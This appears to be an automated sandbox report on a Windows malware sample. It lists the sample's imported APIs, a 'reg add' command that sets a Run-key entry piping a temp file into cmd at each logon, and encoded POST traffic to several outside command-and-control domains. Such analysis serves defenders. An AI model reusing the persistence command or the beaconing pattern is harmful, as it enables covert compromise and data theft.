uxtheme.dll.BufferedPaintRenderAnimation
uxtheme.dll.BeginBufferedAnimation
uxtheme.dll.IsThemeBackgroundPartiallyTransparent
uxtheme.dll.DrawThemeParentBackground
uxtheme.dll.DrawThemeBackground
uxtheme.dll.DrawThemeText
uxtheme.dll.EndBufferedAnimation
uxtheme.dll.GetThemeTransitionDuration
uxtheme.dll.GetBufferedPaintDC
uxtheme.dll.GetBufferedPaintTargetDC
uxtheme.dll.EndBufferedPaint
oleaut32.dll.SysAllocString
oleaut32.dll.SysStringLen
oleaut32.dll.SysFreeString
duser.dll.ForwardGadgetMessage
uxtheme.dll.GetThemeInt
duser.dll.DUserPostEvent
duser.dll.DisableContainerHwnd
uxtheme.dll.BufferedPaintUnInit
werui.dll.WerUIUpdateUIForState
duser.dll.DeleteHandle
duser.dll.DetachWndProc
comctl32.dll.RemoveWindowSubclass
dui70.dll.?OnUnHosted@HWNDHost@DirectUI@@MAEXPAVElement@2@@Z
dui70.dll.?MessageCallback@HWNDHost@DirectUI@@UAEIPAUtagGMSG@@@Z
dui70.dll.?HandleUiaDestroyListener@Element@DirectUI@@UAEXXZ
dui70.dll.?OnDestroy@HWNDHost@DirectUI@@UAEXXZ
uxtheme.dll.BufferedPaintStopAllAnimations
dui70.dll.??1CCBase@DirectUI@@UAE@XZ
uxtheme.dll.DrawThemeParentBackgroundEx
uxtheme.dll.GetThemeEnumValue
user32.dll.MsgWaitForMultipleObjects
winhttp.dll.WinHttpOpen
winhttp.dll.WinHttpSetTimeouts
winhttp.dll.WinHttpSetOption
winhttp.dll.WinHttpConnect
winhttp.dll.WinHttpOpenRequest
winhttp.dll.WinHttpSetStatusCallback
winhttp.dll.WinHttpGetDefaultProxyConfiguration
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
winhttp.dll.WinHttpGetProxyForUrl
winhttp.dll.WinHttpSendRequest
ws2_32.dll.GetAddrInfoW
ws2_32.dll.WSASocketW
ws2_32.dll.#2
ws2_32.dll.#21
ws2_32.dll.#9
ws2_32.dll.WSAIoctl
ws2_32.dll.FreeAddrInfoW
ws2_32.dll.#6
ws2_32.dll.#5
ws2_32.dll.WSARecv
ws2_32.dll.WSASend
winhttp.dll.WinHttpReceiveResponse
winhttp.dll.WinHttpQueryHeaders
winhttp.dll.WinHttpReadData
ws2_32.dll.#22
ws2_32.dll.#3
winhttp.dll.WinHttpCloseHandle
rpcrt4.dll.RpcBindingFree
advapi32.dll.IsValidSid
advapi32.dll.GetLengthSid
advapi32.dll.CopySid
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptReleaseContext
advapi32.dll.RegisterEventSourceW
advapi32.dll.ReportEventW
advapi32.dll.DeregisterEventSource
werui.dll.WerUITerminate
werui.dll.WerUIDelete
oleaut32.dll.#500
duser.dll.DUserFlushMessages
duser.dll.DUserFlushDeferredMessages
dui70.dll.UnInitThread
user32.dll.UnregisterMessagePumpHook
dui70.dll.UnInitProcessPriv
dui70.dll.?Release@ClassInfoBase@DirectUI@@UAEHXZ
dui70.dll.?GetGlobalIndex@ClassInfoBase@DirectUI@@UBEIXZ
dui70.dll.??1ClassInfoBase@DirectUI@@UAE@XZ
advapi32.dll.DuplicateToken

Execute Commands

"cmd"
"C:\Users\Seven01\AppData\Roaming\mozilla firefox\firefox.exe"
dw20.exe -x -s 712
reg  add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Update" /d "cmd /c type "C:\Users\Seven01\AppData\Local\Temp\Update.txt" | cmd"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-05-03 16:13:30 2018-05-03 16:16:27 177

18 HTTP Request(s) detected

http://www.web.supply/be/?uTCpH=p2r5eVxUZRLgLg+z2nYKtXHg4Ou7r9NYUn9T+l2KJNBUttRWGym/d90oPS+91clIVFpdOOYk&U8kx=9rGDCxG86fBdy61
  • Hostname: www.web.supply
  • IP Address: 189.8.78.200
  • Port: 80
  • Count: 1

GET /be/?uTCpH=p2r5eVxUZRLgLg+z2nYKtXHg4Ou7r9NYUn9T+l2KJNBUttRWGym/d90oPS+91clIVFpdOOYk&U8kx=9rGDCxG86fBdy61 HTTP/1.1
Host: www.web.supply
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.web.supply/be/
  • Hostname: www.web.supply
  • IP Address: 189.8.78.200
  • Port: 80
  • Count: 1

POST /be/ HTTP/1.1
Host: www.web.supply
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.web.supply
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.web.supply/be/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

uTCpH=hUnDA1EgOG(2dFaa1ANG3gPh6_LnlfJnGBswjEKnFuxTifhXO1ygIp8iMDChrNlIGGBBBbhuYLo5coG9V3NrCsTB2RKp~dP_E0P8h3gKjel2qcjR1EwhT8N_RJUsXigfdtPJdL7-PaLWxtyjxHQwCz3bbgX2Swn1WmIsCHpf9sJXy1A5ymtR33cGFzTdLSzjltztWVHbFI2Us9ZZ5ZgbDAr8vxa-WVg2mgm54yqSlcyBFPZQJLTqiYdVVX2BObRIuuUrpDrM5S3g6TdMBKOeovpq1co_KOrcJ7IEMYyvSB58Nx93fpJAqnADG88eCjPrO8i377Zm0IjpsUNKRhRDvEwQJstqIGSFWd6-PLJQreOgPEI3oua-gWxXdn3GOg9wDHVkwG~7oPz-i2X2k3XcqyP6hwKUWlx8r695gUj0fKNGud3p~Ymqxa0WTDkAkXRJ7vtcYvfpoeuEB_47Gqc7RsxgfSE_c72QcYMgYfDLgtQRVNG7(errciV3mTzLRZfiBQyxJlVd7ORYnLpr0MtvBf4a~fXyCJDp~Zbh~_VXIGbIWGUlWCEad914p7Ea20JQjUJh4SoecU8PznJc2z4Qr7fCDhq3m6V6Aa7_~6WqDQ1jBY3vvLCew0CPwyAiZQHwc0(KdxbkXZV5dCbs2kKNR60AspxT8g~pDSNV6tG2je2npmXsyYRx9G12EVuKDTTJrm1_rf(xDCCZt9aPmA0feoIeki1JP4QsLCyBsZLqXSFRndJhQOmH0zSTKGZgbH2b6lB6Ft(vnbVVpA5leSPwE0J93Qg6N-nmEAxayF6MoFpE(JW95wbS1zYCWrFzP2r54QztetUUAjiI2MavN8QXg7fHbJcqg9bCZBjZj5lrJnCc68LoDxaQkN6LlM(hzmxjhdlELM8qBMMKtIkGzwxvFD9ouO87YpAKEpHbTMwRO7iMyX8tsZv4RKZBMbSdBPJDMCWreK8_haS-8LRN1T1bw5xBsfVKtm1gHU5lqVh3M60myXn0VJL9wmmcq7GTry3aDaVHP935dH7zRW8G67(uG4mLf390PyYQ7sHIwuxZCHjHSrPvsjcHCFWM2k0_DM4W7ke6aBou~M11bHtkHDbjvCNrkzt3LCWfv-l97LU3n0iv7GHB~XQ1qoonp28jRT(FmUbm4ZUk8raLmGd2BFFtjnHDCfhWOaFrLWxaAMZQD2a5XiMbHvLo27PWbQv-BFAn9To2woZupa3ooZrQcnZo2yTGfttXECtcCJTVFgZRw1gdTfnP2FIH2zq9tvQ2GjsLwqn3h6rsesPzQ7(enp9JS2k0aBI0bGTDLrCHiV3V5hKDIXhZ9hTYHTAvhkPrCr0DaLEVXhCTKOY6vJKCykA6TTviVRXg23zQPYrY(CNrOdVFRDNWx_Vl(v3qlFwi4PCaSmsKL0IM1xtro5URjBfuBP1Hizr7Be7MGT3I32d4hwPRpAv3xECKPgbWvmNGl-3u51HVVmQDjROl~VaeGztt3Pz67uWje6vsX0SDLKsH1xP552QXvwgTAyP4bu0hNk4e7nDbnULAGBQe27hsrfq_DEmFClaaJoW27-B-VYyw~cBAxGheGmPha7BC~UQ9o8wT4g6bygiX6b5tlkz0Xxzbr3a3NgQQZKArMkWHoKlKTUtBq0yVrChc~M(sptj72PlI8wJuTxdEoXEEad3eQAQvgCVq5xCR9JB_GmHmfBH1VFvrId8pS5Fu(uit5dCnrMJU6kb_tFrMMgBhEKN2jQuVJHcjgySVVs9tJVpZBz618bpMbvUFLTg0Eo26vRFW(GuYap(toMebS4HCKHrfS3jLCYkyjvylL3KoJLGZcNVcuxaEcI1RgBF_h8ckbR2-uGwtpoY6Sd2YFkhihc07ARk-DcglTpO8q29fb_lqNuoS3NHGSc79Hz(QJcH_pSMNxRsTA8~xhouvrXmrO0xpiBYIzM2DJA9yK8XRHjEHWjDd2HoJKAg1RCMdxjHFvpZ8Cyccot2tN2ASjjoTLBy1gQE22a~lex5569TRD4m5ayKGDwiNU80mxWOPy_~3frkGYNgIEy02kTcsDxvzhf671nxsD-EerBgY6ed12uJRW8Ce3z3HbHUhnLQ-rFEBRoPg6Lvc8qO1yyW-m0XgogiM3Uxem9w1eS9ZKbbm~fSNuZsaQRTU1YtQZUgkNqv3ny9yEpY4LuEYrvAE14LZ\x00\x00\x00\x00\x00\x00\x00\x00

http://www.web.supply/be/
  • Hostname: www.web.supply
  • IP Address: 189.8.78.200
  • Port: 80
  • Count: 1

POST /be/ HTTP/1.1
Host: www.web.supply
Connection: close
Content-Length: 57159
Cache-Control: no-cache
Origin: http://www.web.supply
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.web.supply/be/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

uTCpH=hUnDAxZRI3vFZHylxBdo6gfQ9_(tstYTETkGjF6dP_hNofRXHTmrOJ8jODCihtp0Lx9JBYtIYKQ6Bta4d1kzOcXU5y2K6bL8Kxvek2oKtPB03_aX318ta8RqarU1Og5LbPCBLabaF7ib9pHGykg0MjzYUDrwSSDHTkg0OmAEjZBj2i9OynpotHtwRF3mDDDZzc3tUFjLd6uWjfRB6KJjKQbVmTSlYkAxqCOp8TuHndKdcNQwOrXhiIN4cwKQNPkcjMAZ3TG0(hbWxi87NLGFrf4_wbU_C-LgEZQcTIyEQBxwER8Afp9Yp3l4fM8QdQ6nF8qvsrJM16bpv3EQXjp2jkxSL88oCR6KWdqxO7BQqcqgYws2lOa-5GxRdn3OOg9ZDE5oxGm7qOP4jEP4sBmhviPuizS0dG0Zr94qj0f0MqZFr-(l0qep~P1OFztNkXV66uc_Sej0reuHZ_0kCo0ZLOo6DhkuePa6c7wjdP7HhuUFZsjAu4TdcWRQ0nLpfIeWBwmHPHhp9MBCn4A81tpBfK8lqovgHJTGvYDI4-RDHlvmYGoLAEMeZcxp95IY91ZRnUhqjSwRR0xPimEm3RE-uuq5EB3Dvb9YJY6A6c~xUgZCNKX3wIW9hnKL60Jffxi4VwzMQyiaGuAZVzTO(lvYMthxq9Q2(kycdDo7wvTck5nBhSG_7odaq2VqFmXhD3Ck33dAjYz8GWygkcO_4HF5KLp86CkEOKIRLDKNsqnqWShRjaVieN~E6DSdXWY5fGL-6nglEpjv385XoB57bCqCaEJ1kEwlJ9uWEDdVzGv3sGpF0sb66waY2Wh8H7J-BW6i5gmqLNZZCl(DzdaudN0Qxr(hcZQCqpLlWjnfmOZBR1iY1_HnF0OIn8qgsoy95X1ynvsFA_QTZaIR1pE03iQfYW5Dwfg0Y7IqDZPuSsE_EqOe7zl69Zi9AOdMNuuzAu1PbBykLbop66el66NfkAJyxo5iv_BsvjZpczNvomhwOJ0LzyStXImh0kWqqYqDsTuRPNdNDuvKNAyZXFc2xt~xNuqrZ3oAMz842-nrr-Y3EXXUf4isyG9QAmmugnEGFtQG5XWFSX8zzNsFaWoRdzfPngdW3xsrPDWvv8cO4qw3gFavhwHByyYM18YPpEpCYgjI2l3k69t86uXFsXhzPF9n1lyUGrhfUtd-KQopRPp3Dwu5XFFpBPnJs6T4fwXiHWY05gN374NDz6HykJDjR0F99AyHdZh8HxESf5~oJGtSwnUNV-fa1HQgrzuVh_IKEj4WxJeu4Z3hVfnnJ4zclv1BYypdOW5sXEf1draE(nnmyir0KS5-6wjSOUAOiUvkUIZgNc1pcA2RHa4chJOs8BEGcSfLdDDEpVHqFqHF~jl-NPxNbUtB9MlZ~O~2hUQQrNmPfzczY34x9Sh_sJAWghnBKeZftReuDPLkIz6fizkJig2Mizr6injrOgbHmwkfq8nu5xrRN2UShmXr~njqWh9Q1OL78sePf7D2fUuKPpYj52y-w141sApsUHLRfuJAJQId~mXhmj(RHzYm5LdspLmOKl2bDEi8H4HXssB6AoSo~e1L2lhRcGLmfbEA8QRc~MVnzAiA(x7oxqAOgi30MQ(EykujACUKLdUnFnyq~tEXSlBV(XHEuiAPgJTqjpfrn9tN2Q9eURR-gVY2fIbbUgs-qAsL8BDMxJ0vU2LwfFCLQWHsIfsqYNdl(diZ15Get-B23j3fvhXIHzBAe51howecUFw9rQWdSJVPdWMuKQTD9q5eMMknXxYpDeGBhAMKok~cS-GbsN~MQ_37MnXeTxuDL8EPj6v_JVGWKL(IJ-8m7CyWa61vlDx-rMAiFl7QgWUml9V5XaKfAV9ix-sGXB4WE9ZgQpSDkn9rfKFAcJVkl4zpC8jKH3T0FMH3rAM36zEiIa6VjZ6N(1CWL2ZrqRAIqeCfO1BbP721KAFEVD7-5EUKbygzIlUL3zjQuaJdUCgjkP6oGQA2m0AWexn6xllptIuZfUIQ68LGG-uQQS2DaULXWOo7wHTpxYWDW4U6U5AwAwZk~nUcNUeLv9iR8ntrJOtcoS51x6hr2LZLMPi45xyRYWsGkOs-gHYxV4zfiJvEvoae0DSFp1rzgG6kv0d5i8U-UxN_MZPAxOfUu7UBGjrT37FSNHUIfom0plVfIM0sDYMT664K(PjV9ol5OXwe50K2k1yn~FcLEq(xaXQ2L_lXj4N-uCrLmi1FZIthh1TlTeOkiCe4KmFk7jyNV-~zdavwKiDy4af4bmBPPLNNfAGyTPBzGsBOGjexh_2H~RmrdTrFEnhsR4utq1FQPDIR0jJjwvnnLhKRwJLnujVQFU4ifRtpMhJAeuMLc-vuIHrGRJHBFijIIMIO6-ynNO79iM2ealtPil94LaQsoqdJI2N10EpEhpQkk

http://www.hizpov.men/be/?uTCpH=3TfDokyFyMr1dM/EKVDocsM3GXg88p1yp6U/F8ivQYRXPWVjNjNcla8JZn15rsFJzB0XWEYR&U8kx=9rGDCxG86fBdy61
  • Hostname: www.hizpov.men
  • IP Address:
  • Port: 80
  • Count: 1

GET /be/?uTCpH=3TfDokyFyMr1dM/EKVDocsM3GXg88p1yp6U/F8ivQYRXPWVjNjNcla8JZn15rsFJzB0XWEYR&U8kx=9rGDCxG86fBdy61 HTTP/1.1
Host: www.hizpov.men
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.hizpov.men/be/
  • Hostname: www.hizpov.men
  • IP Address:
  • Port: 80
  • Count: 1

POST /be/ HTTP/1.1
Host: www.hizpov.men
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.hizpov.men
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.hizpov.men/be/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

uTCpH=(xT52Brcq8aGE5f-BDrxAqtVEV4Z8KVx1OJVNfOZfb1JFjRSZllu1M5Hdy1-~sFIrFkPWCNEqzvtNryuVYvtRMr5eZl9m_7oMn6t2INItwBvZxH_PlXMmeKBw3rzfyRb22BayAIhIDF6DuYdFPGjbzjmoQDWSKUx4Aw_CB5RMCuJZRhAeq6Ax8OlKynb8F5yik6woAVLO6NNbdmu2OhH8qMeQFHgVs~y1AKtHIQEHdlwovPfJ6w0XGsz1xCLpN80AbruCBGz1ZPJQKFbVfLCXtxJ(bM7orjxV9MfGPOLjdAk3qu8Q-I6bZiAW62809MdzudbO6BJG00mjM2BDmP7DZaKVf5L0GhkBNlpEmzEZ0jfkXR-w3KhvXD_Mlq6Y6b6MiTfo7i1rZY_rLkuChMw53KcJseH(ZL0yYizpQHbdQ3NVjQcfLSAkOtWP1xMaphChvcB81cuX5ZWyrZrCRsgLNPOtfsUDWl_GgsZ7st62O9a5KtkPOkTlTvwjMx7APVp2fnHEj5_rYHfpQtomg2jjmn6hYlKn82u9JAS8Wb7e2zVFriDl6CkKonCGYXa025KNkmXqR3MhIKL6UyV14FRxO~CUdHcR83H9ygRGaF6U9FOQWOyGFi3qWJlXGPpKnSB8GgiHcM3N5b4wx7dzR1ywYZmJsCP6OPvyP2m1GPi3uo9sFb5eaFk19(VKPBIrhGmztgu4x6BOaGfVRTmQnGpyqBF64mHKFwUjCljbGrhQ8qU2m4dcKqj8oCSM2ZzyAicQUJDbZUXrZ6-I-P_TCtZGl4rkZsBOuLIPECIv81mlt581YRln8dwlKxkShLg47fFnP6SHZZGGgoDWkE9X30ufPpbggdYeufmXDKBysqCq9gwOIUupMfmFTt6HH(D0aqmRUH7PFG6xPUG21WbipLTN2r-ikqHiuxtnZ7KxSzHYIR0dnCeTcCvLSTsQQyNIIJDfUpsU2~ecStmP_n-sIXTgkJIFx~UWYEC4SCSiMA75YIYQ4nCDvEoPrKlJZDpYywNyPooo_goKegI~3oIBctubNQ0qGGrum66PqLd~6yClZig8Gabj-LdkQgUCJvlC1juDmcZYBUjIpSzCoBJqzRxhbL-tuAAQWTXo1ldFBgY4VXT~8d0yH(WyOAp37ltp3G3samqQOsO2fje3zhjaZTvB5LGasBif1(kX_fRQMuKr3X3lQRI5ipQFLFB4PnBfiZKpukNp73pj5VvG2VCdSBfiwNB61KyCWZaAn~reFN8oYFEsXx2UMD8NpKBVmukkxSQc_jMR4tdngOzAfKBAoa4nOhpOc(UY7d3Xet8d-wnYIHuZo3x9B2e~icwS1WQRZXt5uKaclzs1DuFh7HIxgtEuFFrjK39XfV8LsXKxrVj8I2GFFQAO6hCxOCeHjdITZRwx71OrV2RXx9c4Mu1eJCtx9XY~eEJNZmkFLnHe1ezXWdljQIyiZBbYAELdFucCljqQGZEf9nAL7azYts0wnmlK0HnJTTAoCcWo20bJY5V88NVYRxEl63SfvxSgqS3Kvmjsc0tbc9XzGp_N_Oz0QSN9Ztpc4izXviOhcH7vfRUZjAMdR2fOPHxH6d925(N0jhKXbSsRIGvtFHP9C9_mJuB3V8_kApEKd1bx0BQoewKSdpn8K8tp0jGHlGCSPYopvjnx-nHSnm5bUZQHZcPyx7PSwUQmeBRkiicm0TBeGGX6NoBCZ8ZeU70eYzg7AVT~ynHvbxh(9usuBsuPlF-BezOQfT_W9LA8cLUt5N5DmbIgbo_Lb2J(_o1cwaJ29OHtKGI1rWPtj0-Q2aVBish962ltTLTbKDynifx(0xi65dTWoHDAKFpwccaDHDMpa7fP-Grpf8Hf0yP5gT2e1jwXLaZ1RJfmTLs9YXO56THYDbL5vN7BkGVpjjv4hntG8Ov5ValOSNI1QI2aj3ZTQoVYZZ6x0WMW6KcrE4sYVM7Dy8KY8r0eap9OmOrvwKp20Z0OeQjADwHF-Jbhzzbr8bwzjBWUhm0UiX-4YfLz7qrFDqvhox7zApcFKZCKpG2hRh7lOi7D9qpzfCCj4T6DCx46H7A1pvQzR4N1qQMNW65yCgKMfi-iAHUiT30qwPjYRoxynCof2OW9VBUQO(bo5TavaS7Fza0tQnvW2rQJ0G9TlQxp2QozQHbGbXdBVRXbCS22vu5kB6os4C8yt6q\x00\x00\x00\x00\x00\x00\x00\x00

http://www.hizpov.men/be/
  • Hostname: www.hizpov.men
  • IP Address:
  • Port: 80
  • Count: 1

POST /be/ HTTP/1.1
Host: www.hizpov.men
Connection: close
Content-Length: 57159
Cache-Control: no-cache
Origin: http://www.hizpov.men
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.hizpov.men/be/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

uTCpH=(xT52EXmmsvCA73BFC60e50tWFMTx51k88BzNf~dU5MWBHtSO2Npxs5AUS19zMJwiyQ5WD5uqz3yM-vkQ-67ScmcR6Yri8DvMByPn9pIyw1Xdl(kORHQk-WD7XD-NBp6kFtelxoJfhFhdfZIEt2RVjHpjxXQSrZXrxw3eRhCFjaHcG0_er~XqIzRFQGtgnwJoDawtzFbGd5LV_u23t52068kXHOpbce_2Cj2JLdyFZR8xNXjE60JLndl9Siap9BgHZPcfUOI2ufNb7ljYY7KX9AmkqU7gbD_S44XIPOohdYo5KvFQ-8MK6~MZa26rvpR3OlDHYZjEFkmitmeHUXkGZbQcvpm(VJrBN0oWGrEaybfunB9y3Khm3D9MlqiY6aeMmrbp761j689q48eAzQIy3KYOpyduKfMyfu7owrbahDMfn0YdZ6BrvZ8AVJ6aptPzdp94Ug_W5ZV87EhGV4CG4rdi89sPGhGIkMo7P9m3I4bnqpaMMIXijegnMdZNakd3-C8DBNDj5OQplpUyibigmzVu7hci4L0(IIO8GvRKCDBGLfDnPa4PJ(TSeHYxUBLLXXRnCmnmIHVxACqya4ymMHzT9KgT42S0zobMoVbFuxjdEuqeEOMuzdTcE7ddXXL6jcsNe0EcKTN4Az_8UtS0ZYXJ9ut5Pna~-iFwkLH9tEU1EffAJRQmv3jIdJqmguCudJaz22GMP(vUFTaMniCjpRWzI2PL1AtjCd_a2fhR9OU8BMccrqgyYCUAmZVswubQW5faZAXppK8L57xFwxlZ14jicAaYvq4PCzL9t4Zy-5_lqoui8d3(olxUhPp1buun_~CNLdWEjBdT388c2RkVuJ1gAYFV_iMP26LvMba~J8sBI5MvJ7Uai9JQW3m~r~3QgD3fESTlZQZ9nytiIS0FXHV80Kul85N24uYxyX5BLVqXFGKTPnqBn(nTgaZHKtHZmdJdXqIVBBpO-rOoP2FsVxdFSTFJsAPyFWug_xn1r4lRamHc9ADSY7KL7uUQzoL6YYEksZeGtc97hM0ZdFWLq4Mm3ydvjqaB4aLytud2qOZ9UXY~-nljzQqR7iFZhP-M1kcFT0bEoKKO8J5xilVnbzTr8xEa1rno00kFgkYr1fTseV0q2TjvMlu3rJN22Cqg4ikcIBQ0LTHz2AlRbCURY74dZ57RSH9UPWsW_utrxD3gBNZ8CV9GKZS7ueecS5j6o0Rlry54ZFxW1EsSxdgtC8dqRGZBnJTDF6PdHVJoKB6r2pnXPrLF5eTKXWIrRGofdqRZrxQuhevJP~LEeqwp_ZbWuiQcYx_HYV3Ztw9evSXGaDG(QmIylkNRF2PGY(Ny8O9WEXQtG~J~Lzc6AlshGxKh6bjfpMLeoXXxI0l7c2eD3stMsVl(P7EVi8RAbph1Kx3vjqvYRZI88ayZprv6p3QzNQRFZa5e7brI3bIRBBD1yMvgKQMbAEWGlWAU3TqQAxAS5OaFqaqY4RCkyzHCVvmKhavtDBRzCdZYqN9~edBDGFisq~nZqN435HUA-Si9tQDXMEbz0hXCPyzxkmww49NObivTfy0o5DNqfxcZhkLdx(YH_TyCaY_7YeciwtzHrajV8bY5mWi4E5_8t2FiGYr4TtOLaBfrixcjIlRSpJJrM0xsXrgbgqED-hvtNro8eTodnaXDGFcDKlPtB38c1wykOBxmD2inEfXeEXh485LCYUGWljxZrTmyitm(zH1lapN4emg3HwtUWttHeiSO-nXT_Py85Wuue9ZUWmghqYha6vozdwkdifx4sGgo5mM96ahpmBMSxTgIg4i84Oyj3rIYYCwnByI~1JSvId1P6feQIFX99ghWmvWp7T2AvquvtsPTSDm7Rf2OXr3fLeH(RRzu3qcgZX-vbfXejrw5ONUDV~ipjqS6hnPL5aR23Cqc1lG(xMMPhDoUVsARJh6ohPlcoK95SsHR2M3LzV2Zd(pSPNzF1706xug1AtJC7wyf2ICJcEa9xnazsPc0i8UNReQHTrW4dDi8erJAzWu9JJSxS1GEeYPKOnF1WlHv9nCMd~yyPeIi8DAeTBWrGfP5bv_yAUvxqwSM2mn~hA4XtWduwK4q2z0ix72RitD(W6wUlbg00lZN_zqgaf-iKnXBDH3uTGUdRTiBhr_VHoqsUo5hnTdZfbfdWk8W1yntfeJtnznx_yNi47937FPiHQ-6zsJEOxEDxJtb_bcpUpcaCYbDUm2qw1nkK5imzEFQH3VLw1Xs2howivTGfWc0HeJFvGjZwHrza9ucq1-mCGOyRfrC1WmnXkdhLQxBqctbW(I08sjxqTWxgWit8(iMW3oETUrmXHsnQG68vm5NW5zyQ4LbOOdgaA8IY(rfEOXtd7xYMXomn2kxcvy2S6h5Vv3FQ3EvzE1Dfmb~ff6VIOrbNib8lZdt7kTf

http://www.homekh.com/be/?uTCpH=4jwY9ALpCxr92msl3r8bVeeQb93rgSIL1qTWZ7OdbFpz+isoiTq1gbh9dsPuJHD6JAX7Iq3a&U8kx=9rGDCxG86fBdy61
  • Hostname: www.homekh.com
  • IP Address: 120.77.145.41
  • Port: 80
  • Count: 1

GET /be/?uTCpH=4jwY9ALpCxr92msl3r8bVeeQb93rgSIL1qTWZ7OdbFpz+isoiTq1gbh9dsPuJHD6JAX7Iq3a&U8kx=9rGDCxG86fBdy61 HTTP/1.1
Host: www.homekh.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.homekh.com/be/
  • Hostname: www.homekh.com
  • IP Address: 120.77.145.41
  • Port: 80
  • Count: 1

POST /be/ HTTP/1.1
Host: www.homekh.com
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.homekh.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.homekh.com/be/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

uTCpH=wB8ijkmGCj3I2jgDyeACPeuTTN62ty0ZlPGUapebWUw04gBvgECC7cU2VYHaVULVeTbCEaS1RvC8wIfNIk63AZaT0HEJIZ8dip6yi8p6v50Y(NFRQ6OEVosgyKgcKo6DtLuc3iUE0JeXsd3URH(tL-vouD1DsQZ6BsqlQih1OIf2YkGHzt~hbOiOj-4zx7XTU-if(YlumTQiXWzgg-3WNNOsXSq95Slr(wvu9bzxy0ebZCNAT6r_AFiUGPd3HY(muTXspNnHUxxquTwqsA8rzpR7m_gbzyPS4Zo0VeUF45fQRrCbS9jRDYim2UKXGwUtIl(BpG4DVdzt8zUYXYsbt5wdcrnQcxxhyf6dvmc54Jcdk_jFPLarDtLbCuZAXGt1VVYyTyUIl6mNLvAYycXbZpuhgrJVIFwaU9wkASYo5f9alN3YSeQSVPYY523_4lnebFOnmgb_uskcuXlySjnUxWf9zAnWASXp4Yg9cX6PdcTIqZeUKy(TrHX-YPnI6fj7~fdU9qH1xxlnK9r78-1gvQL2Sce2C9eD(khNvdPrwiMnx7vM7ftZQDSCQNsdgP3qbfBcuHo0gYnrXj54sDFiQhc79MVQ~WRrpTHnASUIH9RCluX8FewmAt60Vh6LjONZUploII5af6fmypREN_EYbJk12T9BVbowkGk3fa9VWIv2gnuCiesIg2NussXuTOCp~VYYjvhk8DRCmphe6bTjr_Z7LFAv0ADXI-7l2xoLaQ6Ity4R5JdqbvyJonWOEMJ02I76WxRD7j2_Hrdlgrl39TrRLe6ve3VHnlmSmOt35vO53oDW0eRchZqZOtvKrjTYqDY5sxXo8mdNTBwRyhKAwYm3Xk535cXp9PznL579njhPWJKe6WTQUlpgqfPno2SpQHu-1E(wr2Tz8tjWjPXWr4Qau9ky5jBmCBB1WeGyoCBNECjXesv7~3SczLkok9EhLsxRGgCvs20aLobgogr-Lk1Ti7o5mPxnvLdz2leNCrZaInjqAJWYkpP98jYlGwDYxge61YayuHWGJHKd(ReeoODUa76s2VC2BqCrzjhNaNeDAEonRBXEX8IfCPUKdNEGrIQzZSg3kzFiIU9HcMH7imHPyxh5sDAWjoos~9QhEGe3OF9n51U-XuyGo5xyaTBARqbWhhW3TlpWzU75ui7uX4gAmdlrH1nFpFGJt05TBEYVcA0lz_RIxSE6JW~RMjBPTYUhbqFW~5nH271AXv6qGoTbFmywedltzU6BgtMDuUlVY6ojZZxhHhO3wmnQnfkvhH1nhv4RPIuCuGnIfJVNzsr9tBHFrwrMV8ulZXPAQ_P8LuJQ9OQn4TPpx3~WrelGlZf0cUqBMZuz~8513KWVlDVcu-YJhrhCz50cbrgx6Fv81N47~G6WX4k3JrmgGH(x4GekUEM-O-siOZvpIcalL6ZxRipaReLNJ1K4McDycqClvKpundNRntTH15Chzby0hWT6dOfAnocXA24fv8WdIWIgupR1QwfDUWK79jFTd7U5lREWtfvqI2CWpwa8JkzqLBLVCdkZgIUXd0T9JLuPQTuBM_gO5tgIcFPm9-PPplSyY106WAdLQ9Jmf4TUCzYPcv~IfoGnOczkYFKZberLL7E6L0CFUZyrKNFPLUNzFMgbCozO3v3z8CUkhEiupuhhV1cIl1WSzV2uzDD-Tv91pxA5rAFbuhTr5mM6PMY7poFw2ssgVdlhHARn~hP8y2VXJUO6